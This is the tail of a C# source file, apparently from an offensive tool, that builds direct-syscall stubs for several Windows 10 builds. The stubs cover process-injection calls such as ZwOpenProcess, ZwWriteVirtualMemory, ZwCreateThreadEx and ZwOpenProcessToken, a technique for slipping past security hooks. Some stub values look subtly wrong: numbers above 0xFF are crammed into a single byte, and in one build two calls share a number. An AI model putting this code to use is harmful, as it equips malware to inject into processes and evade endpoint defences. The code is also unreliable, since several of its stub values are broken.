                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x76);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 8: // ZwOpenThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x128);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 9: // ZwResumeThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 10: // ZwOpenProcessToken
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x122);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;



                } //switch (sysType)
            } // if
            else
            // Windows 10 1809.
            if (osVersionInfo.dwBuildNumber == 17763)
            {
                switch (sysType)
                {
                    case 1: // ZwOpenProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 2: // ZwCreateThreadEx
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBB);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 3: // ZwWriteVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 4: // ZwAllocateVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x03);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 5: // ZwCreateSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 6: // ZwMapViewOfSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 7: // ZwCreateProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xB3);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 8: // ZwOpenThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xb3);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 9: // ZwResumeThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 10: // ZwOpenProcessToken
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x121);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;


                } // switch (sysType)
            } // if
            else
            // Windows 10 1803.
            if (osVersionInfo.dwBuildNumber == 17134)
            {
                switch (sysType)
                {
                    case 1: // ZwOpenProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x25);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 2: // ZwCreateThreadEx
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xBA);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 3: // ZwWriteVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x39);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 4: // ZwAllocateVirtualMemory
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x17);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 5: // ZwCreateSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x49);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 6: // ZwMapViewOfSection
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x27);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 7: // ZwCreateProcess
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0xB3);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 8: // ZwOpenThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x126);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 9: // ZwResumeThread
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x51);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                    case 10: // ZwOpenProcessToken
                        unsafe
                        {
                            fixed (byte* ptr = syscall)
                            {
                                *(ptr + 0) = (byte) ( *(ptr + 0) + 0x48);
                                *(ptr + 1) = (byte) ( *(ptr + 1) + 0x88);
                                *(ptr + 2) = (byte) ( *(ptr + 2) + 0xC9);
                                *(ptr + 3) = (byte) ( *(ptr + 3) + 0xB7);
                                *(ptr + 4) = (byte) ( *(ptr + 4) + 0x120);
                                *(ptr + 5) = (byte) ( *(ptr + 5) + 0x00);
                                *(ptr + 6) = (byte) ( *(ptr + 6) + 0x00);
                                *(ptr + 7) = (byte) ( *(ptr + 7) + 0x00);
                                *(ptr + 8) = (byte) ( *(ptr + 8) + 0x0E);
                                *(ptr + 9) = (byte) ( *(ptr + 9) + 0x04);
                                *(ptr + 10) = (byte) ( *(ptr + 10) + 0xC2);
                            }
                        }
                        break;

                } // switch (sysType)
            } // if
        } // Client OS
        else
        // Empty: no server builds are populated (the README notes they "can be added").
        if (osVersionInfo.dwPlatformId == 3) // Server OS
        {
        }

        // Unmodified seed array if nothing above matched.
        return syscall;
    }




}



```
--------------------------------------------------------------------------------